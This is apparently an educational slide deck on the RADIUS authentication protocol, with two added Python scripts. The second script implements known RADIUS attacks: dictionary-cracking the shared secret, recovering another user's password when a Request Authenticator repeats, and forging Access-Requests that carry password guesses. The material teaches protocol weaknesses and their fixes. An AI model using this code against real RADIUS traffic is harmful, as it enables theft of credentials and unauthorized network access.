Introduction to RADIUS Protocol

Presented By:

Hiral Shah

Varsha Mahalingappa

RADIUS

Introduction :

RADIUS (Remote Authentication Dial In User Service, RFC 2865) is an application-level protocol that carries authentication, authorization and configuration information between a Network Access Server (NAS), which wants to authenticate its links, and a shared Authentication Server.

Transport protocol - UDP (the NAS retransmits on timeout; the server detects duplicates by source address, source port and Identifier)

UDP Port 1812 – Authentication (and authorization)

UDP Port 1813 – Accounting

(Early implementations used ports 1645/1646 instead; firewall rules for legacy equipment often need both pairs.)

Key Features of RADIUS :

Client Server model - the NAS is the client: it passes user information to a designated RADIUS server and acts on the response

Network Security - transactions between client and server are authenticated with a shared secret that is never sent over the network; user passwords are hidden rather than sent in clear text

Flexible Authentication mechanism - PPP PAP or CHAP, UNIX login, and other methods

Extensible protocol - all transactions are variable-length Type-Length-Value attribute triplets, so new attributes can be added without disturbing existing implementations

Terminology (RFC 2865 section 1.1) :

  • Service - the type of service the NAS provides to the user (e.g. PPP, login)
  • Session - each service provided by the NAS to a user; it starts when the service is provided and ends when the service ends
  • Silently discard - the implementation drops the packet without further processing, but should log the error and count the event
  • Access-Request - sent by the NAS to request authentication and authorization
  • Access-Accept - the server accepts the request and returns the configuration attributes for the session
  • Access-Reject - the server refuses the request
  • Access-Challenge - the server asks the client for more information (challenge/response); the client answers with a new Access-Request
  • Accounting-Request - sent by the NAS to the accounting server (RFC 2866)
  • Accounting-Response - the server's acknowledgement that the accounting record was received and stored
RADIUS Overview :

  • The user presents a username and password to the RADIUS client (the NAS).
  • The RADIUS client forwards them to the RADIUS server in an Authentication Request (an Access-Request packet).
  • The RADIUS server answers with an Authentication Acknowledgement (Access-Accept or Access-Reject), and the client grants or refuses the user's session accordingly.

Authentication and Authorization :

  • RADIUS client -> RADIUS server: Access-Request frame carrying User-Name, the hidden User-Password (or a CHAP-Password), NAS-IP-Address or NAS-Identifier, and the type of service requested.
  • RADIUS server -> RADIUS client: Access-Reject, or Access-Challenge (the client must re-send an Access-Request containing the challenge response), or Access-Accept carrying the authorization attributes for the session.

Accounting
  • Accounting follows the authentication exchange: the Access-Request is answered by Access-Reject, Access-Challenge or Access-Accept, and an accepted session is then reported with Accounting-Request / Accounting-Response (RFC 2866).
  • Built-in accounting schemes (as shipped with GNU Radius, the implementation the references point to):
    • Unix accounting
      • Accounting data are stored in files modelled on the Unix utmp/wtmp logs and can be viewed with the radwho and radlast commands
    • Detailed accounting
      • The detailed accounting information is stored in plain text; the resulting files can be parsed with standard text-processing tools
    • SQL accounting
      • Accounting information is stored in an SQL database and processed with standard SQL queries
  • RADIUS is extensible: new attributes can be added without changing the packet format
Packet Frame:
  • Details (every RADIUS packet is a 20-octet header followed by attributes)
    • Code (1 octet) - packet type: 1 Access-Request, 2 Access-Accept, 3 Access-Reject, 4 Accounting-Request, 5 Accounting-Response, 11 Access-Challenge
    • Identifier (1 octet) - matches requests to replies and lets the server detect retransmissions
    • Length (2 octets) - total packet length, 20 to 4096; octets beyond Length are padding, a packet shorter than Length is silently discarded
    • Authenticator (16 octets) - in an Access-Request a random Request Authenticator, which also seeds the User-Password hiding; in a reply the Response Authenticator, MD5(Code + ID + Length + RequestAuth + Attributes + Secret), the value used to authenticate the reply from the RADIUS server
    • Attributes - the data, as Type(1) / Length(1) / Value triplets
Client Server Sequence
  • The NAS sends an Access-Request carrying the user info; the User-Password is hidden by XORing it with MD5(shared secret + Request Authenticator), which is obfuscation rather than encryption with a proper cipher
  • The server answers with an Access-Accept carrying IP address, network mask, allowed session time, etc. (or with Access-Reject / Access-Challenge)
  • The accounting phase starts with the NAS sending an Accounting-Request (Start)
  • When the user logs out the accounting phase ends with the NAS sending an Accounting-Request (Stop) with additional information such as session time and octets transferred
  • The RADIUS server responds with an Accounting-Response once the accounting information is stored; the NAS retransmits the request until it gets one
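As an added example that is not from the presentation or from GNU Radius, the following Python script implements the packet frame and the client/server sequence above: it builds and parses RADIUS packets, hides and recovers User-Password per RFC 2865 section 5.2, computes and verifies the Response Authenticator and the Accounting-Request authenticator (RFC 2866), and runs the Access-Request / Access-Accept / Accounting-Request(Start) / Accounting-Response sequence end to end. The shared secret, identifier, Request Authenticator, user name, password and Framed-IP-Address are constructed test values.

```python
import hashlib
import hmac
import struct

# Packet codes and attribute types used below (RFC 2865 / RFC 2866)
ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
ACCOUNTING_REQUEST, ACCOUNTING_RESPONSE = 4, 5
ATTR_USER_NAME, ATTR_USER_PASSWORD, ATTR_FRAMED_IP, ATTR_ACCT_STATUS_TYPE = 1, 2, 8, 40
ACCT_START = 1

def hide_password(password: bytes, secret: bytes, req_auth: bytes) -> bytes:
    """RFC 2865 5.2: pad to a 16-octet multiple, XOR each block with MD5(secret + previous
    ciphertext block), the first block keyed by the Request Authenticator. Obfuscation, not a cipher."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        prev = bytes(p ^ k for p, k in zip(padded[i:i + 16], keystream))
        out += prev
    return out

def reveal_password(hidden: bytes, secret: bytes, req_auth: bytes) -> bytes:
    """Inverse of hide_password; the received ciphertext block feeds the next MD5."""
    out, prev = b"", req_auth
    for i in range(0, len(hidden), 16):
        keystream = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ k for c, k in zip(hidden[i:i + 16], keystream))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")

def encode_attrs(attrs) -> bytes:
    """Attributes are Type(1) Length(1) Value TLVs; Length counts all three fields."""
    return b"".join(struct.pack("!BB", t, len(v) + 2) + v for t, v in attrs)

def decode_attrs(data: bytes) -> list:
    attrs, i = [], 0
    while i < len(data):
        if i + 2 > len(data) or data[i + 1] < 2 or i + data[i + 1] > len(data):
            raise ValueError("malformed attribute")  # RFC 2865: silently discard
        t, length = data[i], data[i + 1]
        attrs.append((t, data[i + 2:i + length]))
        i += length
    return attrs

def build_packet(code: int, ident: int, authenticator: bytes, attrs) -> bytes:
    body = encode_attrs(attrs)
    return struct.pack("!BBH", code, ident, 20 + len(body)) + authenticator + body

def parse_packet(raw: bytes) -> dict:
    code, ident, length = struct.unpack("!BBH", raw[:4])
    if length < 20 or length > len(raw):
        raise ValueError("bad Length field")  # RFC 2865 3: silently discard
    return {"code": code, "id": ident, "authenticator": raw[4:20], "attrs": decode_attrs(raw[20:length])}

def keyed_authenticator(code, ident, attrs, req_auth, secret) -> bytes:
    """MD5(Code + ID + Length + RequestAuth + Attributes + Secret): the Response Authenticator of every
    reply (RFC 2865 3) and, with req_auth = 16 zero octets, the Accounting-Request authenticator (RFC 2866 3)."""
    body = encode_attrs(attrs)
    return hashlib.md5(struct.pack("!BBH", code, ident, 20 + len(body)) + req_auth + body + secret).digest()

def build_keyed(code, ident, req_auth, attrs, secret) -> bytes:
    return build_packet(code, ident, keyed_authenticator(code, ident, attrs, req_auth, secret), attrs)

def verify_keyed(raw: bytes, req_auth: bytes, secret: bytes) -> bool:
    """True only if the packet was produced by a holder of the shared secret (constant-time compare)."""
    pkt = parse_packet(raw)
    return hmac.compare_digest(pkt["authenticator"],
                               keyed_authenticator(pkt["code"], pkt["id"], pkt["attrs"], req_auth, secret))

def exchange(secret=b"s3cret-shared", ident=0x2A, req_auth=bytes(range(16))) -> dict:
    """Access-Request -> Access-Accept, then Accounting-Request(Start) -> Accounting-Response.
    Secret, identifier and Request Authenticator are constructed test values; a real NAS must
    draw req_auth from a CSPRNG and never reuse it (see the limitations slides)."""
    request = build_packet(ACCESS_REQUEST, ident, req_auth, [
        (ATTR_USER_NAME, b"alice"), (ATTR_USER_PASSWORD, hide_password(b"hunter2!", secret, req_auth))])
    # Server: parse, unhide the password, decide, and sign the reply with the shared secret.
    req = parse_packet(request)
    got = dict(req["attrs"])
    password = reveal_password(got[ATTR_USER_PASSWORD], secret, req["authenticator"])
    code = ACCESS_ACCEPT if (got[ATTR_USER_NAME], password) == (b"alice", b"hunter2!") else ACCESS_REJECT
    reply = build_keyed(code, req["id"], req["authenticator"], [(ATTR_FRAMED_IP, bytes([10, 0, 0, 7]))], secret)
    # Client: act on the reply only if its Response Authenticator verifies under the secret.
    reply_ok = verify_keyed(reply, req_auth, secret)
    # Accounting: the request is authenticated with a zero-filled RequestAuth, the response with the request's.
    acct = build_keyed(ACCOUNTING_REQUEST, ident + 1, bytes(16),
                       [(ATTR_USER_NAME, b"alice"), (ATTR_ACCT_STATUS_TYPE, struct.pack("!I", ACCT_START))], secret)
    acct_reply = build_keyed(ACCOUNTING_RESPONSE, ident + 1, acct[4:20], [], secret)
    return {"password_seen_by_server": password, "reply_code": parse_packet(reply)["code"],
            "reply_valid": reply_ok, "reply_valid_wrong_secret": verify_keyed(reply, req_auth, b"wrong"),
            "acct_valid": verify_keyed(acct, bytes(16), secret),
            "acct_reply_valid": verify_keyed(acct_reply, acct[4:20], secret)}
```

Calling exchange() returns the password the server recovered, an Access-Accept code, and True for the reply and both accounting checks; the same reply verified with the wrong secret yields False, which is the only protection a NAS has against a spoofed server. Note that nothing in the Access-Request itself is checked by the server beyond the Length and attribute framing.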
Limitations
  • Response Authenticator Based Shared Secret Attack
    • An attacker who listens to an Access-Request and the matching server response knows everything hashed into the Response Authenticator except the secret, and can pre-compute the MD5 state over that known prefix:

MD5(Code+ID+Length+ReqAuth+Attrib)

    • Then perform an exhaustive (or dictionary) search on the shared secret, appending each candidate to the pre-computed MD5 state and comparing the result with the captured Response Authenticator.
  • User-Password Attribute Based Shared Secret Attack
    • The attacker attempts a connection to the NAS with a password they know, and intercepts the resulting Access-Request.
    • Since the hidden password is Password XOR MD5(Secret+ReqAuth), XORing the known password back out yields MD5(Secret+ReqAuth); perform an exhaustive search on the shared secret against that value.
  • User-Password Based Password Attack
    • With MD5(Secret+ReqAuth) recovered as above, perform an exhaustive / dictionary attack on a user's password, XORing each guess with that MD5 output and sending it in the User-Password attribute of a new Access-Request that reuses the same ReqAuth.
    • Possible because the Access-Request packet is not authenticated at all, so the server cannot distinguish a forged request from a genuine one.
Limitations Continued…
  • Shared Secret Hygiene
    • Clients are identified by source IP address, so every NAS behind one address is viewed as a single client and must share one secret; one compromise exposes all of them
    • Secrets are typically short, keyboard-typeable strings (small effective key size), enabling easy exhaustive attack
  • Request Authenticator Based Attacks (the protocol depends on the NAS generating unique, unpredictable Request Authenticators; if a NAS repeats one, the keystream MD5(Secret+ReqAuth) repeats too)
    • Passive User-Password Compromise through Repeated Request Authenticators
      • Two Access-Requests with the same ReqAuth hide their passwords with the same keystream, so the XOR of the two User-Password attributes equals the XOR of the two passwords; knowing one password (e.g. the attacker's own) reveals the other
    • Active User-Password Compromise through Repeated Request Authenticators
      • The attacker builds a dictionary of ReqAuth values and the hidden passwords seen with them, as before.
      • When he predicts he can cause the NAS to use a certain ReqAuth, he tries to connect to it with a password he knows and intercepts the Access-Request, recovering the keystream and with it the earlier victim's password.
  • Replay of Server Responses through Repeated Request Authenticators
    • The attacker builds a dictionary of (ReqAuth, ID, entire server response).
    • Most server responses will be Access-Accept, so when the NAS reuses a recorded ReqAuth and ID the attacker can replay the recorded Access-Accept and be granted access without the server ever seeing the request.
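The following Python script is an added illustration of the attacks in the two Limitations slides above; it is not code from the presentation. It constructs a capture (the attacker's own Access-Request, a victim's Access-Request that reuses the same Request Authenticator, and the server's Access-Accept) using a deliberately weak shared secret and a five-word wordlist, all assumptions for the demo, then recovers the secret by both the Response Authenticator and the User-Password route, recovers the victim's password passively without the secret, and forges a guess-carrying Access-Request that the server would accept as well-formed.

```python
import hashlib
import struct

# Constructed capture parameters (assumptions): a weak, guessable shared secret and a
# Request Authenticator that the NAS reuses across two logins.
SECRET = b"radius"
REQ_AUTH = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")
WORDLIST = [b"password", b"cisco", b"testing123", b"radius", b"secret"]

def xor16(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def hide16(password: bytes, secret: bytes, req_auth: bytes) -> bytes:
    """Single-block User-Password hiding (RFC 2865 5.2) for passwords of up to 16 octets."""
    return xor16(password.ljust(16, b"\x00"), hashlib.md5(secret + req_auth).digest())

def attrs_bytes(*attrs) -> bytes:
    return b"".join(struct.pack("!BB", t, len(v) + 2) + v for t, v in attrs)

def access_request(ident: int, req_auth: bytes, user: bytes, hidden: bytes) -> bytes:
    body = attrs_bytes((1, user), (2, hidden))
    return struct.pack("!BBH", 1, ident, 20 + len(body)) + req_auth + body

def parse_attrs(data: bytes) -> dict:
    out, i = {}, 0
    while i < len(data):
        out[data[i]] = data[i + 2:i + data[i + 1]]
        i += data[i + 1]
    return out

# The "capture": attacker's own login (password known to them), a victim's login with the
# same Request Authenticator, and the server's Access-Accept to the attacker's request.
ATTACKER_REQ = access_request(7, REQ_AUTH, b"mallory", hide16(b"known-pw", SECRET, REQ_AUTH))
VICTIM_REQ = access_request(8, REQ_AUTH, b"alice", hide16(b"hunter2!", SECRET, REQ_AUTH))
_accept_attrs = attrs_bytes((8, bytes([10, 0, 0, 7])))
_accept_head = struct.pack("!BBH", 2, 7, 20 + len(_accept_attrs))
ACCEPT = _accept_head + hashlib.md5(_accept_head + REQ_AUTH + _accept_attrs + SECRET).digest() + _accept_attrs

def crack_secret_via_response_authenticator(request: bytes, response: bytes, wordlist):
    """MD5(Code+ID+Length+ReqAuth+Attrs) is fully known from the wire: hash that prefix once,
    then finish the hash with each candidate secret and compare to the Response Authenticator."""
    prefix = hashlib.md5(response[:4] + request[4:20] + response[20:])
    for guess in wordlist:
        h = prefix.copy()
        h.update(guess)
        if h.digest() == response[4:20]:
            return guess
    return None

def crack_secret_via_user_password(request: bytes, known_password: bytes, wordlist):
    """The attacker logged in with a password they know, so
    hidden XOR password = MD5(Secret + ReqAuth); brute-force Secret against that value."""
    target = xor16(parse_attrs(request[20:])[2], known_password.ljust(16, b"\x00"))
    for guess in wordlist:
        if hashlib.md5(guess + request[4:20]).digest() == target:
            return guess
    return None

def keystream_from_own_login(own_request: bytes, own_password: bytes) -> bytes:
    return xor16(parse_attrs(own_request[20:])[2], own_password.ljust(16, b"\x00"))

def passive_password_recovery(own_request: bytes, own_password: bytes, victim_request: bytes):
    """Repeated ReqAuth => same keystream, so hidden_a XOR hidden_b = pw_a XOR pw_b; no secret needed."""
    if own_request[4:20] != victim_request[4:20]:
        return None
    keystream = keystream_from_own_login(own_request, own_password)
    return xor16(parse_attrs(victim_request[20:])[2], keystream).rstrip(b"\x00")

def forge_request_for_guess(own_request: bytes, own_password: bytes, guess: bytes, ident: int) -> bytes:
    """Access-Request carries no authenticator the server checks, so the attacker reuses the captured
    ReqAuth and recovered keystream to submit arbitrary password guesses for any user name."""
    keystream = keystream_from_own_login(own_request, own_password)
    return access_request(ident, own_request[4:20], b"alice", xor16(guess.ljust(16, b"\x00"), keystream))

def server_unhide(request: bytes, secret: bytes) -> bytes:
    """What the server recovers from a request; used here only to show the forged packet is valid."""
    return xor16(parse_attrs(request[20:])[2], hashlib.md5(secret + request[4:20]).digest()).rstrip(b"\x00")
```

All three secret and password recoveries succeed against this capture because the secret is in the wordlist and the Request Authenticator repeats; with a random 16-octet secret and a CSPRNG-generated authenticator per request, the dictionary searches become infeasible and the XOR trick no longer applies, while the request forgery remains possible because nothing in an Access-Request is authenticated.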
Conclusion
  • RADIUS is a remote authentication protocol.
  • RADIUS is a de-facto standard for remote authentication.
  • RADIUS is an extensible protocol, and can support many authentication methods (e.g. EAP, carried in EAP-Message attributes).
  • RADIUS has several weaknesses.
    • The User-Password hiding is an ad hoc MD5-based stream cipher whose keystream repeats whenever the secret and Request Authenticator repeat
    • The Access-Request transaction is not authenticated at all (only the server's replies carry an authenticator)
    • The RADIUS specification should require each client to use a different Shared Secret. It should also require the shared secret to be a random bit string at least 16 octets long, generated by a cryptographically secure PRNG.
  • DIAMETER (RFC 3588) was brought in to replace RADIUS and fix some of the flaws
      • Uses a reliable transport, TCP or SCTP, instead of UDP
      • Better transport-level security using IPsec or TLS
References
  • GNU Radius source: http://ftp.gnu.org/gnu/radius/
  • http://www.panasia.org.sg/conf/pan/c001p028.htm
  • RFC 2865, Remote Authentication Dial In User Service (RADIUS): http://www.ietf.org/rfc/rfc2865.txt
  • RFC 2866, RADIUS Accounting: http://www.ietf.org/rfc/rfc2866.txt
  • GNU Radius home page: http://www.gnu.org/software/radius/radius.html
  • http://www2.rad.com/networks/2000/radius/home.htm